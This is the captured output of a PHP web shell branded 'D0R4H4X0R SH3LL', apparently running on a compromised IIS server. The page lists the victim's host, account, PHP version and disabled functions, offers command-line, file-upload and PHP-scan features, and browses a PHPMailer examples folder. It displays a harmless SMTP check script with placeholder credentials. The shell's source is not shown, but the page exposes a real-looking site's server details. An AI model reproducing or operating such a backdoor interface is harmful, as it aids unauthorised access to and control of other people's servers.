D0R4H4X0R SH3LL

Server Information

Server: Microsoft-IIS/10.0
System: Windows NT BH-PLESK-WEB3 10.0 build 20348 (Windows Server 2022) AMD64
User: IWPD_8556(lensai) ( 0 )
PHP Version: 8.3.21
Python Version: Python is not available
Disabled Functions:, Cron, Curl, Ftp, GCC, Mail, Mysql, PKEXEC, Perl, Python, SendMail, Ssh, Wget, exec, passthru, shell_exec, system

Features

Command Line

Find Longest Directory Path

Scan New PHP Files

Upload File

Directory: D:/INETPUB/VHOSTS/lensai.com/httpdocs/admin/mail/examples/

Current File : D:/INETPUB/VHOSTS/lensai.com/httpdocs/admin/mail/examples/smtp_check.phps

<?php
/**
 * This uses the SMTP class alone to check that a connection can be made to an SMTP server,
 * authenticate, then disconnect
 */

//SMTP needs accurate times, and the PHP time zone MUST be set
//This should be done in your php.ini, but this is how to do it if you don't have access to that
date_default_timezone_set('Etc/UTC');

require '../PHPMailerAutoload.php';

//Create a new SMTP instance
$smtp = new SMTP;

//Enable connection-level debug output
$smtp->do_debug = SMTP::DEBUG_CONNECTION;

try {
//Connect to an SMTP server
    if ($smtp->connect('mail.example.com', 25)) {
        //Say hello
        if ($smtp->hello('localhost')) { //Put your host name in here
            //Authenticate
            if ($smtp->authenticate('username', 'password')) {
                echo "Connected ok!";
            } else {
                throw new Exception('Authentication failed: ' . $smtp->getLastReply());
            }
        } else {
            throw new Exception('HELO failed: '. $smtp->getLastReply());
        }
    } else {
        throw new Exception('Connect failed');
    }
} catch (Exception $e) {
    echo 'SMTP error: '. $e->getMessage(), "\n";
}
//Whatever happened, close the connection.
$smtp->quit(true);
images DIR
Directory drwxrwxrwx
scripts DIR
Directory drwxrwxrwx
styles DIR
Directory drwxrwxrwx
File -rw-rw-rw-
contents.html 0.677 KB
File -rw-rw-rw-
exceptions.phps 1.447 KB
File -rw-rw-rw-
gmail.phps 2.009 KB
File -rw-rw-rw-
index.html 6.141 KB
File -rw-rw-rw-
LGPLv3.txt 7.459 KB
File -rw-rw-rw-
login.php 0.582 KB
File -rw-rw-rw-
mail.phps 1.038 KB
File -rw-rw-rw-
File -rw-rw-rw-
File -rw-rw-rw-
sendmail.phps 1.108 KB
File -rw-rw-rw-
smtp.phps 1.831 KB
File -rw-rw-rw-
smtp_check.phps 1.206 KB
File -rw-rw-rw-
File -rw-rw-rw-
test.html 0.006 KB
File -rw-rw-rw-
D0R4H4X0R SH3LL